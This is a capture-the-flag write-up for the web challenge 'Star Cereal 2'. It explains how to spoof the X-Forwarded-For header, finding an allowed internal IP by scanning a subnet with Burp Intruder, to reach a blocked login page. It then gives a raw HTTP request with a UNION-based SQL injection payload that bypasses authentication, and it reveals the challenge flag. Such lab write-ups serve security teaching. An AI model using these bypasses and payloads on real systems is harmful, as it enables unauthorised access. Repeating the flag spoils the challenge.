Star Cereal 2
Spoofable client IP address, SQL injection vulnerability

Description

Ha, that was sneaky! But I've patched the login so that people like you can't gain access anymore. Stop hacking us!
http://20.198.209.142:55045
The flag is in the flag format: STC{...}
Author: zeyu2001

Solution

In index.php, notice the following comment
1
<!--
2
Star Cereal page by zeyu2001
3
​
4
TODO:
5
1) URGENT - fix login vulnerability by disallowing external logins (done)
6
2) Integrate admin console currently hosted at http://172.16.2.155
7
-->
Copied!
Point 1) is referring to the previous challenge. Point 2) is interesting.
If we go to login.php, we get a 403 Forbidden Page:
1
<h1>Forbidden</h1>
2
<p>Only admins allowed to login.</p>
Copied!

Spoofable Client IP

We could deduce that perhaps the server filters requests by the client IP.
A common security misconfiguration in implementing such a filter is the use of the X-Forwarded-For header. This header is used for identifying the originating IP address of a client connecting to a web server through an HTTP proxy or a load balancer.
Note that HTTP request headers can be easily spoofed. Knowing that one of the internal IP addresses is 172.16.2.155, we may want to check the 172.16.2.0/24 subnet for valid client IPs.
If we do a scan (e.g. using Burp Suite Intruder) for the 172.16.2.0/24 subnet with the X-Forwarded-For header, we would find that if we set:
1
X-Forwarded-For: 172.16.2.24
Copied!
then we would see the login page.

Burp Suite Intruder Scan

First, set the payload position as follows:
Then, configure the payload as a list of numbers from 1 to 255.
Run the attack. Sort the output by either the Status or Length columns. We will find that X-Forwarded-For: 172.16.2.24 gives us a 200 OK response code, and shows us the login page.
​

SQL Injection

Once we have access to the login page, notice the login form fields.
1
<form action="/login.php" method="post">
2
<div class="form-group">
3
<label for="email">Email address</label>
4
<input type="email" class="form-control" id="email" name="email" placeholder="Enter email">
5
</div>
6
<div class="form-group">
7
<label for="pass">Password</label>
8
<input type="pass" class="form-control" id="pass" name="pass" placeholder="Enter password">
9
</div>
10
<button type="submit" class="btn btn-primary">Submit</button>
11
</form>
Copied!
We need to submit an email and a pass parameter. We can exploit SQL injection to get the flag.
1
POST /login.php HTTP/1.1
2
Host: localhost:55043
3
X-Forwarded-For: 172.16.2.24
4
​
5
...
6
​
7
Content-Type: application/x-www-form-urlencoded
8
Content-Length: 51
9
​
10
email=test&pass=test' UNION SELECT 'test', 'test';#
Copied!
The flag is STC{w0w_you'r3_r3lly_a_l33t_h4x0r_bc1d4611be52117c9a8bb99bf572d6a7}.
Last modified 4mo ago